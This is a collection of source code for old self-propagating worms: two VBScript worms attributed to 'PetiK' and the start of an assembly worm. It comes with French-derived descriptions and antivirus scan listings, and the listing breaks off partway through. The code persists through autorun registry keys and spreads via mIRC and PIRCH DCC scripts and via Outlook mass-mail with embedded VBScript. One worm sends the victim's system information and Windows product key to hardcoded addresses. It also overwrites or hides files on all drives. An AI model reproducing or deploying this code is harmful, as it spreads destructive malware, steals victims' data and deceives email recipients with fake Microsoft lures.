Adds to the registry : HKLM\Software\Microsoft\Windows\CurrentVersion\Run Showvar = %WINDIR%\Showvar.vbs
Spreads with mIRC by writing a script.
Spreads via PIRCH.
Spreads via mail : Subject : "Salut l'ami. Ouvre vite, la chance peut tourner !!"
No file is attached; the code of the worm is directly in the HTML code of the mail. It creates a VBS file in the WINDIR directory and runs it.

' When the day is the 5th, a message box is shown 'ShowVar by PetiK 21/01/2000 Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set file = fso.OpenTextFile(WScript.ScriptFullName,1) vbscopie = file.ReadAll DEBUT() Sub DEBUT() On Error Resume Next Set win = fso.GetspecialFolder(0) RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") Set c = fso.GetFile(WScript.ScriptFullName) ShowVar = (win&"\Showvar.vbs") c.Copy (ShowVar) ws.RegWrite RUN,ShowVar If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then Mirc "" End If If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then Pirch "" End If if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then EMail() End If Divers() End Sub Function Mirc(Path) 'On Error Resume Next If Path = "" Then If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc" If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32" PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc" End If If Path <> "" Then Set Script = fso.CreateTextFile(Path & "\script.ini", True) Script.writeline "[script]" Script.writeline "n0=on 1:JOIN:#:{" Script.writeline "n1= /if ( $nick == $me ) { halt }" Script.writeline "n2= /." 
& chr(100) & chr(99) & chr(99) & " send $nick " & SV2 Script.writeline "n3=}" Script.Close ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1" End If End Function Function Pirch(path) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set ws = CreateObject("wscript.shell") If path = "" Then If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch" If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32" pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe" End If If path <> "" Then Set Script = fso.CreateTextFile(path & "\events.ini", True)

Script.WriteLine "[Levels]" Script.WriteLine "Enabled=1" Script.WriteLine "Count=6" Script.WriteLine "Level1=000-Unknowns" Script.WriteLine "000-UnknownsEnabled=1" Script.WriteLine "Level2=100-Level 100" Script.WriteLine "100-Level 100Enabled=1" Script.WriteLine "Level3=200-Level 200" Script.WriteLine "200-Level 200Enabled=1" Script.WriteLine "Level4=300-Level 300" Script.WriteLine " 300-Level 300Enabled=1" Script.WriteLine "Level5=400-Level 400 " Script.WriteLine "400-Level 400Enabled=1" Script.WriteLine "Level6=500-Level 500" Script.WriteLine "500-Level 500Enabled=1" Script.WriteLine "" Script.WriteLine "[000-Unknowns]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[100-Level 100]" Script.WriteLine "User1=*!*@*" Script.WriteLine "UserCount=1" Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & SV3 Script.WriteLine "EventCount=1" Script.WriteLine "" Script.WriteLine "[200-Level 200]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[300-Level 300]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[400-Level 400]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[500-Level 500]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.Close End If ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1" End Function Function EMail() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Myself = fso.opentextfile(wscript.scriptfullname, 1) I = 1 Do While Myself.atendofstream = False MyLine = Myself.readline Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34)) Loop Myself.Close htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; 
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY bgColor=#ffffff><SCRIPT language=vbscript>" htm = htm & vbCrLf & "On Error Resume Next" htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" htm = htm & vbCrLf & "If Err.Number <> 0 Then" htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>Pour lire cet EMail, merci d'activer l'option ActiveX.<br>Rouvrez ce message et accepter les ActiveX<br>Microsoft Outlook</font>" & Chr(34) & "" htm = htm & vbCrLf & "Else" htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)" htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34) htm = htm & vbCrLf & "vbs.Close" htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")" htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &

Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & "" htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "Ce message contient de nombreux erreurs.<br>Désolé !<br>" & Chr(34) & "" htm2 = htm2 & vbCrLf & "End If" htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>" HtmlBody = htm & htm2 Set mapi = Outlook.GetNameSpace("MAPI") For Each Addresslist In mapi.AddressLists If Addresslist.AddressEntries.Count <> 0 Then AddCount = Addresslist.AddressEntries.Count Set Msg = Outlook.CreateItem(0) Msg.Subject = "Salut l'ami. Ouvre vite, la chance peut tourner !!" Msg.HtmlBody = HtmlBody Msg.DeleteAfterSubmit = True For II = 1 To AddCount Set Addentry = Addresslist.AddressEntries(II) If AddCount = 1 Then Msg.BCC = Addentry.Address Else Msg.BCC = Msg.BCC & "; " & Addentry.Address End If Next Msg.send End If Next Outlook.Quit End If ws.regwrite "HKCU\Software\ShowVar\MAIL", "1" End Function Function Divers() If Day(Now()) = 5 Then MsgBox "Et si on faisait une partie d'echec ?",vbinformation,"WarGames" End If AZE = ws.RegRead ("HKCR\txtfile\DefaultIcon") ws.RegWrite "HKCR\VBSfile\DefaultIcon\",AZE End Function

File ShowVar.vbs received on 05.16.2009 19:40:46 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result VBS.Lee.Based!IK VBS/Lee Worm/Lee.Based.2 Worm/VBS.Lee-based VBS/Pica.Q VBS:Malware-gen VBS/Level Generic.ScriptWorm.A5CDC117 VBS/Pica.Q WORM.Virus VBS.Petick. VBS/VBSWG!generic VBS/Pica.Q Email-Worm.VBS.Lee-based VBS/Petik.E@mm Generic.ScriptWorm.A5CDC117 VBS.Lee.Based Email-Worm.VBS.Lee-based MIRC/Generic MIRC/Generic Worm.Lee.Based.2 Virus:VBS/Petik.E VBS/Pica.Q VBS/Lee-based.K VBS.Lee.A VBS.Petik.E Unknown Script Virus Mal/VBSMail-A VBS.LoveLetter.Var VBS.Petik.E

Additional information
File size: 6557 bytes
MD5: b4a5df075e6d5278036e07be004b3e09
SHA1: e757ae3f2a165cdb1861c8c8743bd0f76c28d606


Name : VBS/Outlook/mIrc/PIRCH/PetiK.A
Author : PetiK
Language : VBS
Date : 30/01/2001
Size : 9766 bytes

It copies itself into the WINDIR folder under the name PetiK.txt.vbs. To hide this, it changes the icon of .VBS files to that of .TXT files.
It then infects mIRC: it looks for the default folder containing MIRC.INI and, if it finds it, creates a SCRIPT.INI file inside that folder.
It then infects PIRCH in the same way.
For Outlook, it writes its code inside the message as VBScript, so that the virus activates as soon as the message is read.
It also sends various information to two addresses, petik@caramail.com and ppetik@hotmail.com. The information is:
- User name and Organization
- Computer name
- Country
- WINDOWS version and version number
- Product ID
- Registration (product key) number
- Internet Explorer start page
- Download folder
- Names of the WINDOWS, SYSTEM, TEMP and PROGRAM FILES folders
and sends all of this with the subject: "Message pour PetiK de XXX", where XXX is the user name.
The message sent to everyone else is: "Important Message From Microsoft Corporation"
It then infects files according to their extension:
VBS and VBE: writes the virus code inside.
JS and JSE: writes the code and changes the extension: file.js => file.vbs
EXE, INI, GIF, JPG and HTM: creates a new .VBS file containing the virus code
MP3, DOC, XLS, PPT and HLP: sets the hidden attribute

'VBS/Outlook/mIrc/PIRCH/PetiK.A by PetiK
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll
DEBUT()

Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
Set c = fso.GetFile(WScript.ScriptFullName)
PetiK = (win&"\PetiK.txt.vbs")
c.Copy (PetiK)
ws.RegWrite RUN,PetiK
VBSI = ws.RegRead ("HKCR\VBSFile\DefaultIcon\")
TXTI = ws.RegRead ("HKCR\txtfile\DefaultIcon\")
ws.RegWrite "HKLM\Software\PetiK\ICONE VBS",VBSI
ws.RegWrite "HKCR\VBSFile\DefaultIcon\",TXTI
If ws.RegRead ("HKLM\Software\PetiK\") <> "OK" Then
  EMail()
End If
If ws.RegRead ("HKLM\Software\PetiK\MIRC") <> "OK" then
  Mirc ""
End If
If ws.RegRead ("HKLM\Software\PetiK\PIRCH") <> "OK" then
  Pirch ""
End If
lecteur()
End Sub

Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
  Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
  I = 1
  Do While Myself.atendofstream = False
    MyLine = Myself.readline
    Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34))
  Loop
  Myself.Close
  htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY bgColor=#ffffff><SCRIPT language=vbscript>"
  htm = htm & vbCrLf & "On Error Resume Next"
  htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
  htm = htm & vbCrLf & "If Err.Number <> 0 Then"
  htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this EMail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
  htm = htm & vbCrLf & "Else"
  htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)"
  htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
  htm = htm & vbCrLf & "vbs.Close"
  htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
  htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
  htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & ""
  htm2 = htm2 & vbCrLf & "End If"
  htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
  HtmlBody = htm & htm2
  Set mapi = Outlook.GetNameSpace("MAPI")
  For Each Addresslist In mapi.AddressLists
    If Addresslist.AddressEntries.Count <> 0 Then
      AddCount = Addresslist.AddressEntries.Count
      Set Msg = Outlook.CreateItem(0)
      Msg.Subject = "Important Message From Microsoft Corporation"
      Msg.HtmlBody = HtmlBody
      Msg.DeleteAfterSubmit = True
      For II = 1 To AddCount
        Set Addentry = Addresslist.AddressEntries(II)
        If AddCount = 1 Then
          Msg.BCC = Addentry.Address
        Else
          Msg.BCC = Msg.BCC & "; " & Addentry.Address
        End If
      Next
      Msg.send
    End If
  Next
  Set msg2 = Outlook.CreateItem(0)
  ComputerName = CreateObject("WScript.NetWork").ComputerName
  NOM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
  ENT = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
  VER = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
  NUM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
  REC1 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
  REC2 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
  PFD = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
  PDEM = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
  DDIR = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
  PAYS = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
  WINDIR = fso.GetSpecialFolder(0)
  SYSDIR = fso.GetSpecialFolder(1)
  TMPDIR = fso.GetSpecialFolder(2)
  msg2.BCC = "petik@caramail.com;ppetik@hotmail.com"
  msg2.Subject = "Message pour PetiK de " & NOM
  m2 = "-Information :"
  m2 = m2 & vbCrLf & "Date : " & date
  m2 = m2 & vbCrLf & "Heure : " & time
  m2 = m2 & vbCrLf & "NOM DE L'ORDINATEUR : " & ComputerName
  m2 = m2 & vbCrLf & "ENTREPRISE : " & ENT
  m2 = m2 & vbCrLf & "PAYS : " & PAYS
  m2 = m2 & vbCrLf & "SYSTEME D'EXPLOITATION : " & VER & " " & NUM
  m2 = m2 & vbCrLf & "NUMERO D'IDENTIFICATION : " & REC1
  m2 = m2 & vbCrLf & "NUMERO D'ENREGISTREMENT : " & REC2
  m2 = m2 & vbCrLf & "PAGE DE DEMARRAGE : " & PDEM
  m2 = m2 & vbCrLf & "DOSSIER DE TELECHARGEMENT : " & DDIR
  m2 = m2 & vbCrLf & "DOSSIER WINDOWS : " & WINDIR
  m2 = m2 & vbCrLf & "DOSSIER SYSTEME : " & SYSDIR
  m2 = m2 & vbCrLf & "DOSSIER TEMPORAIRE : " & TMPDIR
  m2 = m2 & vbCrLf & "DOSSIER PROGRAM FILES : " & PFD
  msg2.Body = m2
  msg2.DeleteAfterSubmit = True
  msg2.Send
  Outlook.Quit
End If
ws.RegWrite "HKLM\Software\PetiK\","OK"
End Function

Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
  If fso.FileExists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
  If fso.FileExists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
  PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
  PK2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
  If fso.FileExists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
  If fso.FileExists(PFD & "\mirc32\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
  Set Script = fso.CreateTextFile(Path & "\script.ini", True)
  Script.writeline "[script]"
  Script.writeline "n0=on 1:JOIN:#:{"
  Script.writeline "n1= /if ( $nick == $me ) { halt }"
  Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & PK2
  Script.writeline "n3=}"
  Script.Close
  ws.RegWrite "HKLM\Software\PetiK\MIRC", "OK"
End If
End Function

Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
  If fso.FileExists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
  If fso.FileExists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
  pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
  PK3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
  If fso.FileExists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
  If fso.FileExists(pfDir & "\pirch32\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
  Set Script = fso.CreateTextFile(path & "\events.ini", True)
  Script.WriteLine "[Levels]"
  Script.WriteLine "Enabled=1"
  Script.WriteLine "Count=6"
  Script.WriteLine "Level1=000-Unknowns"
  Script.WriteLine "000-UnknownsEnabled=1"
  Script.WriteLine "Level2=100-Level 100"
  Script.WriteLine "100-Level 100Enabled=1"
  Script.WriteLine "Level3=200-Level 200"
  Script.WriteLine "200-Level 200Enabled=1"
  Script.WriteLine "Level4=300-Level 300"
  Script.WriteLine " 300-Level 300Enabled=1"
  Script.WriteLine "Level5=400-Level 400 "
  Script.WriteLine "400-Level 400Enabled=1"
  Script.WriteLine "Level6=500-Level 500"
  Script.WriteLine "500-Level 500Enabled=1"
  Script.WriteLine ""
  Script.WriteLine "[000-Unknowns]"
  Script.WriteLine "UserCount=0"
  Script.WriteLine "EventCount=0"
  Script.WriteLine ""
  Script.WriteLine "[100-Level 100]"
  Script.WriteLine "User1=*!*@*"
  Script.WriteLine "UserCount=1"
  Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & PK3
  Script.WriteLine "EventCount=1"
  Script.WriteLine ""
  Script.WriteLine "[200-Level 200]"
  Script.WriteLine "UserCount=0"
  Script.WriteLine "EventCount=0"
  Script.WriteLine ""
  Script.WriteLine "[300-Level 300]"
  Script.WriteLine "UserCount=0"
  Script.WriteLine "EventCount=0"
  Script.WriteLine ""
  Script.WriteLine "[400-Level 400]"
  Script.WriteLine "UserCount=0"
  Script.WriteLine "EventCount=0"
  Script.WriteLine ""
  Script.WriteLine "[500-Level 500]"
  Script.WriteLine "UserCount=0"
  Script.WriteLine "EventCount=0"
  Script.Close
End If
ws.RegWrite "HKLM\Software\PetiK\PIRCH", "OK"
End Function

Sub lecteur
On Error Resume Next
dim f,f1,fc
Set dr = fso.Drives
For Each d in dr
  If d.DriveType=2 or d.DriveType=3 Then
    liste(d.path&"\")
  End If
Next
End Sub

Sub infecte(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
  ext = fso.GetExtensionName(f1.path)
  ext = lcase(ext)
  if (ext="vbs") or (ext="vbe")
    Set ap=fso.OpenTextFile(f1.path,2,True)
    ap.Write vbscopie
    ap.Close
  elseif (ext="js") or (ext="jse") Then
    Set ap=fso.OpenTextFile(f1.path,2,True)
    ap.Write vbscopie
    ap.Close
    bn=fso.GetBaseName(f1.path)
    Set cop=fso.GetFile(f1.path)
    cop.Copy(dossier&"\"&bn&".vbs")
    fso.DeleteFile(f1.path)
  elseif (ext="exe") or (ext="ini") or (ext="gif") or (ext="jpg") or (ext="htm") Then
    Set cr = fso.CreateTextFile(f1.path&".vbs")
    cr.Write vbscopie
    cr.Close
    fso.DeleteFile(f1.path)
  elseif (ext="mp3") or (ext="doc") or (ext="xls") or (ext="ppt") or (ext="hlp") Then
    Set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
  End If
Next
End Sub

Sub liste(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
  infecte(f1.path)
  liste(f1.path)
Next
End Sub

File PetiK.vbs received on 05.16.2009 19:29:07 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: VBS.Lee.Based!IK VBS/Petik Worm/Petik.A1 Worm/VBS.VBS VBS/Pica.Q VBS:Malware-gen VBS/Level Generic.ScriptWorm.C6E6F4BD VBS/Petik Worm.VBS.Email-Worm.Lee-based SCRIPT.WORM.Virus VBS.Smile. VBS/VBSWG!generic VBS/Pica.Q Email-Worm.VBS.Lee-based VBS/LeeBased.E@mm Generic.ScriptWorm.C6E6F4BD VBS.Lee.Based Email-Worm.VBS.Lee-based VBS/Generic VBS/Generic Worm.Petik.A1 Worm:VBS/LoveLetter.gen probably unknown SCRIPT VBS/Lee-based.F VBS.Petik.F@mm VBS.Petik.F Unknown Script Virus VBS/VBSWG-2B VBS.Pet_Tick.A@mm VBS_PETIK.F IRC-Worm.IRC.Generic VBS.Petik.F VBS.Petik.F

Additional information
File size: 9766 bytes
MD5: c9103a19fecc9f28dda136a81899d2fe
SHA1: e06a3a4da1ce93f9005977877c85733a057da4e0

comment $
04/02/2001 => 07/02/2001

DESCRIPTION:
Registers itself as a "Service Process", that is, it is not visible in the task list (CTRL+ALT+DEL).
Then copies itself into the SYSTEM folder under the name ie042601.exe: %SysDir%\ie042601.exe
and registers itself in the WIN.INI file:
[windows]
run=%SysDir%\ie042601.exe
(where %SysDir% is the default name of the SYSTEM folder)
Creates the file SCRIPT.INI in C:\, copies it into C:\MIRC and C:\MIRC32, then deletes the original in C:\
Creates EMAIL.VBS in the %WinDir% directory as "read-only".
Creates WSOCK32.BAT and C:\WIN.DRV in %WinDir% as "hidden files".
The program then tries to obtain the IP address of the French-language Yahoo site (www.yahoo.fr).
If it succeeds, it runs WSOCK32.BAT:
- Runs EMail.vbs = sends the program to every recipient in the address book.
- Downloads petik.bmp into C:\
Changes the wallpaper to the image "petik.bmp".
All BMP files in the WINDOWS directory get the hidden attribute.

TO COMPILE:
tasm32 /M /ML ie042601.asm
tlink32 -Tpe -x -aa ie042601.obj,,,import32
$

.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn CreateFileA:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetCurrentProcessId:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn RegisterServiceProcess:PROC
extrn SetCurrentDirectoryA:PROC
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC

;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegCloseKey:PROC

;WSOCK32.dll
extrn gethostbyname:PROC

;USER32.dll
extrn SystemParametersInfoA:PROC

.data
szBAT        db 260 dup (0)
szInfo       db 260 dup (0)
szOrig       db 260 dup (0)
szVBS        db 260 dup (0)
szWinini     db 260 dup (0)
DIR          db 260 dup (0)
FileHandle   dd ?
RegHandle    dd ?
SearchHandle dd ?
octets       dd ?
Copie        db "\ie042601.exe",00h
batfile      db "\wsock32.bat",00h
vbsfile      db "\EMail.vbs",00h
bmpfile      db "C:\petik.bmp",00h
drvfile      db "C:\Win.drv",00h
inifile      db "C:\script.ini",00h
script1      db "C:\mirc\script.ini",00h
script2      db "C:\mirc32\script.ini",00h
Winini       db "\\WIN.INI",00h
run          db "run",00h
windows      db "windows",00h
yahoo        db "http://www.yahoo.fr",00h
SOUS_CLE     db "Control Panel\Desktop",00h
TWP_D        db "TileWallpaper",00h
TWP_S        db "0",00h
WPS_D        db "WallpaperStyle",00h
WPS_S        db "2",00h
FICHIER      db "*.bmp",00h

FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_HIDDEN   equ 00000002h
FILE_ATTRIBUTE_NORMAL   equ 00000080h
CREATE_ALWAYS           equ 00000002h
FILE_SHARE_READ         equ 00000001h
GENERIC_WRITE           equ 40000000h
KEY_SET_VALUE           equ 00000002h
REG_SZ                  equ 00000001h
HKEY_CURRENT_USER       equ 80000001h
SPI_SETDESKWALLPAPER    equ 00000020

max_path equ 260

filetime struc
  LowDateTime  dd ?
  HighDateTime dd ?
filetime ends

win32 struc
  FileAttributes      dd ?            ; File attributes
  CretionTime         filetime ?      ; Creation date
  LastAccessTime      filetime ?      ; Last access
  LastWriteTime       filetime ?      ; Last modification
  FileSizeHigh        dd ?            ; File size
  FileSizeLow         dd ?            ; Same as above
  Reserved0           dd ?            ;
  Reserved1           dd ?            ;
  FileName            dd max_path(?)  ; Long file name
  AlternativeFileName db 13 dup(?)    ; Short file name
                      db 3 dup(?)     ;
win32 ends

CHERCHE win32 <>

inid:   db "[script]",0dh,0ah
        db "n0=on 1:JOIN:#:{",0dh,0ah
        db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
        db "n2= /.dcc send $nick "
szCopie db 260 dup (0)
        db "",0dh,0ah
        db "n3=}",00h
INITAILLE equ $-inid

vbsd:   db 'Dim fso,ws,file',0dh,0ah
        db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
        db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
        db 'DEBUT()',0dh,0ah
        db 'Sub DEBUT()',0dh,0ah
        db 'EMAIL()',0dh,0ah
        db 'End Sub',0dh,0ah
        db 'Sub EMAIL()',0dh,0ah
        db 'Set OApp=CreateObject("Outlook.Application")',0dh,0ah
        db 'If OApp="Outlook" Then',0dh,0ah
        db 'Set Mapi = OApp.GetNameSpace("MAPI")',0dh,0ah
        db 'For Each AddList In Mapi.AddressLists',0dh,0ah
        db 'If AddList.AddressEntries.Count <> 0 Then',0dh,0ah
        db 'For AddListCount = 1 To AddList.AddressEntries.Count',0dh,0ah
        db 'Set AddListEntry = AddList.AddressEntries(AddListCount)',0dh,0ah
        db 'Set msg = OApp.CreateItem(0)',0dh,0ah
